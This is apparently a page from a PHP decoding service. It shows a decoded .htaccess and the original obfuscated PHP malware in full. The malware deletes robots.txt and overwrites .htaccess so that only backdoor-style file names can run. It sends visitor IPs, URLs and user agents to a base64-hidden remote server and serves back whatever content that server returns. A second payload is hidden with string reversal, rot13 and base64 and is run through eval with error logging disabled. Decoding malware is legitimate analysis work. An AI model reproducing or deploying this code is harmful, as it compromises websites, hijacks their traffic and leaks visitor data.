Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url)..
Decoded Output download
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
Did this file decode correctly?
Original Code
<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzU0ODgtY2g0LXYyMDMudW1saWtlb2sueHl6'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<?php $Vfzci = 'str'.'rev'; $dNcSF = 's'.'tr'.'_rot1'.'3'; $CtRIo = 'b'.'as'.'e64'.'_deco'.'de'; ini_set('error_log', NULL); error_reporting(0); ini_set('log_errors', 0); ini_set('display_errors', 0); /* 4a9946d3a7686949877b32766128e27e0e68915a***/ eval($CtRIo($dNcSF($Vfzci('=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')))); ?>
Function Calls
h2 | 1 |
print_r | 1 |
file_exists | 1 |
base64_decode | 2 |
Stats
MD5 | 3f318ac66c41c0e388a2405c9e039478 |
Eval Count | 1 |
Decode Time | 322 ms |